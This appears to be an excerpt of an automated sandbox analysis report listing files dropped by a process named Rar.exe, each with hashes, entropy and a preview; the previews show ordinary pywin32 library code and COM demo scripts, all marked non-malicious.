                                                                                                                                                                                      SHA-256:3C07B55189D333054A9D3C537A9DA3B8BFC68E349B4E884EE33768780D9341B7
                                                                                                                                                                                      SHA-512:0596A519B8B27E28C2BD443D60790A20ECB34E107E0CB058A71919C46C5F8BB338F5F8167A247770E2F1BC9C69BEDB2C1FCB39A647853C364D1D53F44B8C5FD4
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Utilities for selecting and enumerating the Type Libraries installed on the system."""..import pythoncom.import win32api.import win32con...class TypelibSpec:. def __init__(self, clsid, lcid, major, minor, flags=0):. self.clsid = str(clsid). self.lcid = int(lcid). # We avoid assuming 'major' or 'minor' are integers - when. # read from the registry there is some confusion about if. # they are base 10 or base 16 (they *should* be base 16, but. # how they are written is beyond our control.). self.major = major. self.minor = minor. self.dll = None. self.desc = None. self.ver_desc = None. self.flags = flags.. # For the SelectList. def __getitem__(self, item):. if item == 0:. return self.ver_desc. raise IndexError("Cant index me!").. def __lt__(self, other): # rich-cmp/py3k-friendly version. me = (. (self.ver_desc or "").lower(),. (self.desc
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):9524
                                                                                                                                                                                      Entropy (8bit):4.807103058801087
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:iNLkApkQ5JTIeB/vVuvjpCmc2wyyvJlBaG3e4yj2m6D5kzyWxA+KllnWbCk1eqUy:iKQIY0r40iFuT2BUWxlW11DHrP
                                                                                                                                                                                      MD5:14CC505029C95BF56782803508B2B055
                                                                                                                                                                                      SHA1:2CDAA4273F079B71549BF0246824849C2A025C5F
                                                                                                                                                                                      SHA-256:26217E6B780B392E3B13E64585BDB0C3120F75CE0C9E86FD20E55B59F6F66509
                                                                                                                                                                                      SHA-512:9C8780DD8C4E8EFB8C6257CEB5D0FF890AA2224CE840393C1A1F24A1EF813090DC68C34252B2F2D0BE223E234C2853C77C14207A00D39FAF04F2626708F49255
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import commctrl.import pythoncom.import win32api.import win32con.import win32ui.from pywin.mfc import dialog...class TLBrowserException(Exception):. "TypeLib browser internal error"...error = TLBrowserException..FRAMEDLG_STD = win32con.WS_CAPTION | win32con.WS_SYSMENU.SS_STD = win32con.WS_CHILD | win32con.WS_VISIBLE.BS_STD = SS_STD | win32con.WS_TABSTOP.ES_STD = BS_STD | win32con.WS_BORDER.LBS_STD = (. ES_STD | win32con.LBS_NOTIFY | win32con.LBS_NOINTEGRALHEIGHT | win32con.WS_VSCROLL.).CBS_STD = ES_STD | win32con.CBS_NOINTEGRALHEIGHT | win32con.WS_VSCROLL..typekindmap = {. pythoncom.TKIND_ENUM: "Enumeration",. pythoncom.TKIND_RECORD: "Record",. pythoncom.TKIND_MODULE: "Module",. pythoncom.TKIND_INTERFACE: "Interface",. pythoncom.TKIND_DISPATCH: "Dispatch",. pythoncom.TKIND_COCLASS: "CoClass",. pythoncom.TKIND_ALIAS: "Alias",. pythoncom.TKIND_UNION: "Union",.}..TypeBrowseDialog_Parent = dialog.Dialog...class TypeBrowseDialog(TypeBrowseDialog_Parent):. "B
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3339
                                                                                                                                                                                      Entropy (8bit):4.691100940722656
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:zJpegE/6zsuCxcGHTOc6bLuUcvFT7OWFDTddwy:zliLuGcGiJmrrmy
                                                                                                                                                                                      MD5:76160F2827C8F53E210662AF76460E0A
                                                                                                                                                                                      SHA1:BA39AF38ECA07AB6510170D33A7CBFFBD65DB51D
                                                                                                                                                                                      SHA-256:CCFC5FAD479402B41C2299CCB3468680DEE120BFA76B0A0E0C4F34E7866AF6DC
                                                                                                                                                                                      SHA-512:B4F4777CAF6BA19EA084833FE7824A8AC42A8CFA6BFDD4845BED030E3AC16D6CE7E3D748309A69CDA9205E3492C317077D93BB7B4AE00D10F39580E07520BA0D
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""General client side utilities...This module contains utility functions, used primarily by advanced COM.programmers, or other COM modules..""".import pythoncom.from win32com.client import Dispatch, _get_good_object_..PyIDispatchType = pythoncom.TypeIIDs[pythoncom.IID_IDispatch]...def WrapEnum(ob, resultCLSID=None):. """Wrap an object in a VARIANT enumerator... All VT_DISPATCHs returned by the enumerator are converted to wrapper objects. (which may be either a class instance, or a dynamic.Dispatch type object)... """. if type(ob) != pythoncom.TypeIIDs[pythoncom.IID_IEnumVARIANT]:. ob = ob.QueryInterface(pythoncom.IID_IEnumVARIANT). return EnumVARIANT(ob, resultCLSID)...class Enumerator:. """A class that provides indexed access into an Enumerator.. By wrapping a PyIEnum* object in this class, you can perform. natural looping and indexing into the Enumerator... Looping is very efficient, but it should be noted that although random. access is suppo
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3894
                                                                                                                                                                                      Entropy (8bit):4.8078641484480125
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:OJuvuqYsmZI8WMM1hEtQPhq6vUMMc7X7nDFZpu/kHLcv:OJuWqYsvRPhES9McJZ8MHLcv
                                                                                                                                                                                      MD5:122A930971B0763428CDDB507BF9232B
                                                                                                                                                                                      SHA1:B9065E8EB53905A4E383AE26AF210436C4045C34
                                                                                                                                                                                      SHA-256:9B305A5BEE20D5D2637AEE832B2DCBA21E1EE23630F8F2C3BA43F7AA2B585EDB
                                                                                                                                                                                      SHA-512:F4346A84C7CF9358276BBF51A5CC42A8C2767677A8E884CF3FC5A4C4DE4851AF52EC1577171681814CB1101563D6706E384764F743FAF537DA9EFC321ECDCEEB
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# Implements _both_ a connectable client, and a connectable server..#.# Note that we cheat just a little - the Server in this demo is not created.# via Normal COM - this means we can avoid registering the server..# However, the server _is_ accessed as a COM object - just the creation.# is cheated on - so this is still working as a fully-fledged server...import pythoncom.import win32com.server.connect.import win32com.server.util.from pywin32_testutil import str2bytes.from win32com.server.exception import Exception..# This is the IID of the Events interface both Client and Server support..IID_IConnectDemoEvents = pythoncom.MakeIID("{A4988850-49C3-11d0-AE5D-52342E000000}")..# The server which implements.# Create a connectable class, that has a single public method.# 'DoIt', which echos to a single sink 'DoneIt'...class ConnectableServer(win32com.server.connect.ConnectableServer):. _public_methods_ = [. "DoIt". ] + win32com.server.connect.ConnectableServer._public_methods_.
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2948
                                                                                                                                                                                      Entropy (8bit):4.564498202320599
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:/LebwXuCKnbbnkPz2GXPSCzYh9dbSxSlcs9Lk0mpOqCORkT7A3R7+2tZQezY:/Lec1KbLTGXPSuYvRSxCct0mpPCjTSkP
                                                                                                                                                                                      MD5:5BECE80B04F95E1085EE003B5E060DA6
                                                                                                                                                                                      SHA1:8628ED3F2FA6D0035BB6F3892604F429C8D4AC1F
                                                                                                                                                                                      SHA-256:230D40B68504B41FE6D3905735F6DC07D2A8ED8B1B766C2175DDBD3DE6D895AD
                                                                                                                                                                                      SHA-512:60D7DF761C60572876394883DED753DF7A19B53C2C9C3E37B33F6C81992EEB2A507493D16F1ECE964F1628CB8C669662CF07262183F49A53556CAFAF4C5129E3
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import pythoncom.import win32con..formats = """CF_TEXT CF_BITMAP CF_METAFILEPICT CF_SYLK CF_DIF CF_TIFF. CF_OEMTEXT CF_DIB CF_PALETTE CF_PENDATA CF_RIFF CF_WAVE. CF_UNICODETEXT CF_ENHMETAFILE CF_HDROP CF_LOCALE CF_MAX. CF_OWNERDISPLAY CF_DSPTEXT CF_DSPBITMAP CF_DSPMETAFILEPICT. CF_DSPENHMETAFILE""".split().format_name_map = {}.for f in formats:. val = getattr(win32con, f). format_name_map[val] = f..tymeds = [attr for attr in pythoncom.__dict__.keys() if attr.startswith("TYMED_")]...def DumpClipboard():. do = pythoncom.OleGetClipboard(). print("Dumping all clipboard formats..."). for fe in do.EnumFormatEtc():. fmt, td, aspect, index, tymed = fe. tymeds_this = [. getattr(pythoncom, t) for t in tymeds if tymed & getattr(pythoncom, t). ]. print("Clipboard format", format_name_map.get(fmt, str(fmt))). for t_this in tymeds_this:. # As we are enumerating there should be no need
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3666
                                                                                                                                                                                      Entropy (8bit):4.708146579094374
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:dlJlyKGuMR80LnqiR1qCOlMBLN/2XqDa5wt:vOluMFL1wlaLxAfit
                                                                                                                                                                                      MD5:7B67C9B10BF9296E26C31A537CA3A7EA
                                                                                                                                                                                      SHA1:EC4D7AEF8133DDF2C4F1A82C59351313C025519F
                                                                                                                                                                                      SHA-256:55F3A355A7136FF55725BC0468097AA605026BACBF0CDE4A3371FA739A0C3E95
                                                                                                                                                                                      SHA-512:DA7D29471A0AACA917AB1AD20B3E2BD834D8592907E787706658F380335C3645F2FE6C00F5B14CA1BAEAF023D3A39E3FF7E59EB28FC604F000BDB4708A175906
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# A sample originally provided by Richard Bell, and modified by Mark Hammond...# This sample demonstrates how to use COM events in an aparment-threaded.# world. In this world, COM itself ensures that all calls to and events.# from an object happen on the same thread that created the object, even.# if they originated from different threads. For this cross-thread.# marshalling to work, this main thread *must* run a "message-loop" (ie,.# a loop fetching and dispatching Windows messages). Without such message.# processing, dead-locks can occur...# See also eventsFreeThreaded.py for how to do this in a free-threaded.# world where these marshalling considerations do not exist...# NOTE: This example uses Internet Explorer, but it should not be considerd.# a "best-practices" for writing against IE events, but for working with.# events in general. For example:.# * The first OnDocumentComplete event is not a reliable indicator that the.# URL has completed loading.# * As we are demonstrating
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3464
                                                                                                                                                                                      Entropy (8bit):4.703893146931307
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:V37jteSYpmMRpon2dFw0oLFhI4rueKpDDqABMY1qAw/2XqAsCZ5Y7XVZ+Do+GnZx:xYQMRPixhHunqiR1qn/2XqDaU6SUIt
                                                                                                                                                                                      MD5:0A4587CA277DF0591C0FBCFA4000FBEB
                                                                                                                                                                                      SHA1:FF8BD298F13DB23C4E468182244FDCCA4F8EA43A
                                                                                                                                                                                      SHA-256:5A87150FAB137377757B2D09AC942CF1CEBC7112139AB35B347E9B48BCDEA8EA
                                                                                                                                                                                      SHA-512:D330B50D95A161A0F623F53E600CD630E50462443DE152F870EDD1B6E93D51C7A86920C9F87760E993878FF782940FC1F7B7FC7E4D9085A13E878E6B18B1F585
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# A sample originally provided by Richard Bell, and modified by Mark Hammond...# This sample demonstrates how to use COM events in a free-threaded world..# In this world, there is no need to marshall calls across threads, so.# no message loops are needed at all. This means regular cross-thread.# sychronization can be used. In this sample we just wait on win32 event.# objects...# See also ieEventsApartmentThreaded.py for how to do this in an.# aparment-threaded world, where thread-marshalling complicates things...# NOTE: This example uses Internet Explorer, but it should not be considerd.# a "best-practices" for writing against IE events, but for working with.# events in general. For example:.# * The first OnDocumentComplete event is not a reliable indicator that the.# URL has completed loading.# * As we are demonstrating the most efficient way of handling events, when.# running this sample you will see an IE Windows briefly appear, but.# vanish without ever being repainted...im
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):6113
                                                                                                                                                                                      Entropy (8bit):5.140198564686407
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:Ys+uSjXATySNDrYJgw3KbAq3aFaTJghDSbGa2zoyb61Fl9T+d2Rtb5YWGim4QQGo:d+uKATRDrsgw3W3uIJ0IGa2s11Fh5YOf
                                                                                                                                                                                      MD5:C71AD79D2BE8D1C6F7F034CAE1CCF217
                                                                                                                                                                                      SHA1:A3B9FFF9DF0E4AD4CF248AB9732A1A71AC5417EC
                                                                                                                                                                                      SHA-256:41D219244D8F77A45B06EC8E99819FA61449EFE49E11EC472AE6EB3F2B589707
                                                                                                                                                                                      SHA-512:1F701DD265693BCFB9D9E0E20B401D90D484C13CCF38E48258463CB0D6DF21CD2CB4C7F6E884DC3391C07E38C7EB792E4ECAFA838646EB3EA82BB925C4537272
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# A demo plugin for Microsoft Excel.#.# This addin simply adds a new button to the main Excel toolbar,.# and displays a message box when clicked. Thus, it demonstrates.# how to plug in to Excel itself, and hook Excel events..#.#.# To register the addin, simply execute:.# excelAddin.py.# This will install the COM server, and write the necessary.# AddIn key to Excel.#.# To unregister completely:.# excelAddin.py --unregister.#.# To debug, execute:.# excelAddin.py --debug.#.# Then open Pythonwin, and select "Tools->Trace Collector Debugging Tool".# Restart excel, and you should see some output generated..#.# NOTE: If the AddIn fails with an error, Excel will re-register.# the addin to not automatically load next time Excel starts. To.# correct this, simply re-register the addin (see above).#.# Author <ekoome@yahoo.com> Eric Koome.# Copyright (c) 2003 Wavecom Inc. All rights reserved.#.# Redistribution and use in source and binary forms, with or without.# modification, are permitte
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):16255
                                                                                                                                                                                      Entropy (8bit):4.784702077372018
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:wwB/xRuKNx996Mb2kuT/0je8KGCP+RjGUxFr7NKLCVdLDZ4:F/xRuKNnBbG0jeRGCG7cL2dLN4
                                                                                                                                                                                      MD5:F4A8D236736CCE64076DD84EEA3DC1C6
                                                                                                                                                                                      SHA1:D329100BB5719CD86CBB25DD6FF8504E65DA0F53
                                                                                                                                                                                      SHA-256:AB3348F8C9314A1ABB335C0811A693312DDD41C2E386DA781D54A7FA8F8FFA07
                                                                                                                                                                                      SHA-512:976A4DC59C1CEA00289A8994BF6AEA72892F0531BEC02472BEC7B9D81D1FFA62ADC2E0D1AEF582F4DE3D9665B2BA1870C750D213B9A006B08C22FE67CA168CA0
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Excel IRTDServer implementation...This module is a functional example of how to implement the IRTDServer interface.in python, using the pywin32 extensions. Further details, about this interface.and it can be found at:. http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dnexcl2k2/html/odc_xlrtdfaq.asp."""..# Copyright (c) 2003-2004 by Chris Nilsson <chris@slort.org>.#.# By obtaining, using, and/or copying this software and/or its.# associated documentation, you agree that you have read, understood,.# and will comply with the following terms and conditions:.#.# Permission to use, copy, modify, and distribute this software and.# its associated documentation for any purpose and without fee is.# hereby granted, provided that the above copyright notice appears in.# all copies, and that both that copyright notice and this permission.# notice appear in supporting documentation, and that the name of.# Christopher Nilsson (the author) not be used in advertising or publicity.
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ISO-8859 text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):7085
                                                                                                                                                                                      Entropy (8bit):4.96839296134514
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:+cq3/1skZPkAkmx9Kam3qAA/lhouvXDGR:+c6x9kAtA
                                                                                                                                                                                      MD5:9F76D1AF1057C9B4F1FDA69DDB81CF8C
                                                                                                                                                                                      SHA1:5CB456ADCD12C3FC013867FFB3B28BD2B67645E1
                                                                                                                                                                                      SHA-256:C0E6B891E5C044FE0B986CBB4EA1103C865B11C88BDBE02777F98E3BF939FFD3
                                                                                                                                                                                      SHA-512:E3CE5F716C4ADDF168E1A41A0971366796667A24C17E800233622936AF21A21ADD86005B86757D6B39C543034371B8AD4C3E94299B22324A425046A24F5DBD53
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# -*- coding: latin-1 -*-..# PyWin32 Internet Explorer Button.#.# written by Leonard Ritter (paniq@gmx.net).# and Robert F.rtsch (info@robert-foertsch.com)...""".This sample implements a simple IE Button COM server.with access to the IWebBrowser2 interface...To demonstrate:.* Execute this script to register the server..* Open Pythonwin's Tools -> Trace Collector Debugging Tool, so you can. see the output of 'print' statements in this demo..* Open a new IE instance. The toolbar should have a new "scissors" icon,. with tooltip text "IE Button" - this is our new button - click it..* Switch back to the Pythonwin window - you should see:. IOleCommandTarget::Exec called.. This is the button being clicked. Extending this to do something more. useful is left as an exercise...Contribtions to this sample to make it a little "friendlier" welcome!."""..# imports section..import pythoncom.import win32api.import win32com.import win32com.server.register.from win32com import universal.from win
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ISO-8859 text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):11009
                                                                                                                                                                                      Entropy (8bit):4.724867722730395
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:DclLpsSg/O7dAy1kne9TDfxTa9FMH101vCwtsLBht9OBBfvOtbp:DclLpS2v1kne9HIFO101vJGsE
                                                                                                                                                                                      MD5:C20570F72D0898158348D2E629E4ACCD
                                                                                                                                                                                      SHA1:844365436EB8792B04254D5AE41D68EB4C92B6ED
                                                                                                                                                                                      SHA-256:C6E23015E8EBCEFB43B2E0CB8BBF6C0A0729ACA6294CACE1E548A5D111D0B8EF
                                                                                                                                                                                      SHA-512:90DA2DF7EE752D0131DDCFB4DABF1E5B7708EC4FBFDA5DC301A573106EF5FB7B5AC08547BF50C6B5F2B66557E5042449F30635883760BE0FC3AA099120C10086
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# -*- coding: latin-1 -*-..# PyWin32 Internet Explorer Toolbar.#.# written by Leonard Ritter (paniq@gmx.net).# and Robert F.rtsch (info@robert-foertsch.com)...""".This sample implements a simple IE Toolbar COM server.supporting Windows XP styles and access to.the IWebBrowser2 interface...It also demonstrates how to hijack the parent window.to catch WM_COMMAND messages.."""..# imports section.import sys.import winreg..import pythoncom.import win32com.from win32com import universal.from win32com.axcontrol import axcontrol.from win32com.client import Dispatch, DispatchWithEvents, constants, gencache, getevents.from win32com.shell import shell.from win32com.shell.shellcon import *..try:. # try to get styles (winxp). import winxpgui as win32gui.except:. # import default module (win2k and lower). import win32gui..import array.import struct..import commctrl.import win32con.import win32ui..# ensure we know the ms internet controls typelib so we have access to IWebBrowser2 later on.
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4700
                                                                                                                                                                                      Entropy (8bit):5.013799263198753
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:Y+oVuyejXM32ghDS82a2zvVO1TfVAiiQQmoxNppa0fv27tx:EuyeM320z2a2ZO1T+QMpJfv27tx
                                                                                                                                                                                      MD5:B82C0AB32A466625D8665B0FFA7E4F20
                                                                                                                                                                                      SHA1:37F3A92CB66A57D3ACBF5C12C59D4F2E4C601E46
                                                                                                                                                                                      SHA-256:FE60E008E7F39E35FB7B8680DAA21980013CCA574B2A072AFA5C7BD293ECF5C9
                                                                                                                                                                                      SHA-512:D054905F6460B56020B3DAF6CACE0FB3413AB3A426417D88FC6FA4B5A0DFDB414C9150BB51C9054E5A7B8A8EE5BF01DFC12199C11F37E85BE0CC5EF3C5547389
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# A demo plugin for Microsoft Outlook (NOT Outlook Express).#.# This addin simply adds a new button to the main Outlook toolbar,.# and displays a message box when clicked. Thus, it demonstrates.# how to plug in to Outlook itself, and hook outlook events..#.# Additionally, each time a new message arrives in the Inbox, a message.# is printed with the subject of the message..#.# To register the addin, simply execute:.# outlookAddin.py.# This will install the COM server, and write the necessary.# AddIn key to Outlook.#.# To unregister completely:.# outlookAddin.py --unregister.#.# To debug, execute:.# outlookAddin.py --debug.#.# Then open Pythonwin, and select "Tools->Trace Collector Debugging Tool".# Restart Outlook, and you should see some output generated..#.# NOTE: If the AddIn fails with an error, Outlook will re-register.# the addin to not automatically load next time Outlook starts. To.# correct this, simply re-register the addin (see above)..import sys..import pythoncom.fro
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2088
                                                                                                                                                                                      Entropy (8bit):4.841312035932402
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:DezkLUSx4SXwuhnCOer+UtylNRCbcfqUDqaUMGkUs1x2W2RCu:DeXu4cw4n9gt0Cbc1edMGkUs1x2W2RX
                                                                                                                                                                                      MD5:05A4C79538B5C128E768BB151D62B305
                                                                                                                                                                                      SHA1:EC53BC9528D5BB0D72392C21556C7F8C8C18DEF7
                                                                                                                                                                                      SHA-256:6455CA354B75CF3CFAB9402A1E20297B600FD07DE028B49FA2BC12818C3937B5
                                                                                                                                                                                      SHA-512:0A4028F966F939A8239406A975B5860EEAF4FD3F45C6C66B8206D0D6371B07C69663680EBC138A60E992D1C4D0D8AE9F5AE671BF412A3B82D16AED47B23F2570
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import pythoncom.from win32com.server import exception, util..VT_EMPTY = pythoncom.VT_EMPTY...class Bag:. _public_methods_ = ["Read", "Write"]. _com_interfaces_ = [pythoncom.IID_IPropertyBag].. def __init__(self):. self.data = {}.. def Read(self, propName, varType, errorLog):. print("read: name=", propName, "type=", varType). if propName not in self.data:. if errorLog:. hr = 0x80070057. exc = pythoncom.com_error(0, "Bag.Read", "no such item", None, 0, hr). errorLog.AddError(propName, exc). raise exception.Exception(scode=hr). return self.data[propName].. def Write(self, propName, value):. print("write: name=", propName, "value=", value). self.data[propName] = value...class Target:. _public_methods_ = ["GetClassID", "InitNew", "Load", "Save"]. _com_interfaces_ = [pythoncom.IID_IPersist, pythoncom.IID_IPersistPropertyBag].. def GetClassID(self):. rai
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:C++ source, ASCII text
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):30291
                                                                                                                                                                                      Entropy (8bit):5.191660584865603
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:T3NxCIlJB+AOxPMVJ4s6/ixXl3OPRUMM1sm8:T3NZJOxPgJ0/sXgPRl
                                                                                                                                                                                      MD5:3AB6186148CDF889998AE52D3DD456ED
                                                                                                                                                                                      SHA1:2B0A656ECDA5AF68F3309C875F6A0BF0D1C287D7
                                                                                                                                                                                      SHA-256:B4787DA122CC411A498E1CEB8C9F553F61AB75C3C64C8880EF5FF916C6132427
                                                                                                                                                                                      SHA-512:74E1D73C06FF3DD293A19326EC223DEFF8B3E2957251164E9B6CE696C3C03D8A14DA1F41F2A8123C7ECF1675EC26D5FE7FE4EB038D6E3E2CE6CCC7ABD1B331EE
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:/* PythonCOM.h.. Main header for Python COM support... This file is involved mainly with client side COM support for. Python... Most COM work put together by Greg Stein and Mark Hammond, with a. few others starting to come out of the closet.... --------------------------------------------------------------------. Thread State Rules. ------------------. These rules apply to PythonCOM in general, and not just to. the client side... The rules are quite simple, but it is critical they be followed.. In general, errors here will be picked up quite quickly, as Python. will raise a Fatal Error. However, the Release() issue in particular. may keep a number of problems well hidden... Interfaces:. -----------. Before making ANY call out to COM, you MUST release the Python lock.. This is true to ANY call whatsoever, including the COM call in question,. but also any calls to "->Release();".. This is normally achieved with the calls. PY_INTERFACE_PRECALL and PY_INTERFACE_POSTCALL, which release. an
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:C source, ASCII text
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4264
                                                                                                                                                                                      Entropy (8bit):4.397028432654304
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:TyohkJzoxaK1tIEOrtl4Yz54ev7+RiAG9rh:Tyohk49OYYz54wqRiV9rh
                                                                                                                                                                                      MD5:B198C9127BCD708943E89FA4DCF54414
                                                                                                                                                                                      SHA1:950143556273F7D0EB815A59AFD17B32CB568552
                                                                                                                                                                                      SHA-256:4727BC4FCA34D7C70FCC0897A78DFB94B88D82029668D0DD030E5DBD8C654FFF
                                                                                                                                                                                      SHA-512:35EBAAC04C67857E9CA8388DFC24486928D03DC795268B864D44B051C30AE173F0535D50F5C3F5C2DB10C1F9DDDD630920E69C2B90590C9E87EDA391C0B21038
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:// Support for PythonCOM and its extensions to register the interfaces,.// gateways and IIDs it supports..//.// The module can simply declare an array of type PyCom_InterfaceSupportInfo, then.// use the macros to populate it..//.// See Register.cpp and AXScript.cpp for examples on its use...#ifndef __PYTHONCOMREGISTER_H__.#define __PYTHONCOMREGISTER_H__..#include "PythonCOMServer.h" // Need defns in this file.....typedef struct {. const GUID *pGUID; // The supported IID - required. const char *interfaceName; // Name of the interface - required. const char *iidName; // Name of the IID that goes into the dict. - required. PyTypeObject *pTypeOb; // the type object for client PyI* side - NULL for server only support.. pfnPyGatewayConstructor ctor; // Gateway (PyG*) interface constructor - NULL for client only support..} PyCom_InterfaceSupportInfo;..#define PYCOM_INTERFACE_IID_ONLY(ifc) \. {
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:C++ source, ASCII text
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):9027
                                                                                                                                                                                      Entropy (8bit):4.474111423776976
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:nOiD5kIJMJ3PM9DxA/TwHwpev4aI4b4fj4Cbv4jDm4u4O4K474z4BIGmSTVA/qqD:nOiD+lPkH6ES/90g
                                                                                                                                                                                      MD5:7A1C425DC9D5F72AA1A9AD6DA5D7A0F4
                                                                                                                                                                                      SHA1:41C855FB6ED7B77C6BA2023C4DF379D8DB84C86F
                                                                                                                                                                                      SHA-256:C8BAFAB9869FEF9EE906D514E8E06E928BC1C135FA2A68BC5F817DAD89EE478F
                                                                                                                                                                                      SHA-512:AE7EB27F8B4398D5F62DF8C08D3B7E3D77294DD280696AAE3E5A9CFBAAA7EC71FD076DD9B9E6F8677F622E2BBA01E73290CC5FAA603619224BEBAA29DD60B4EA
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
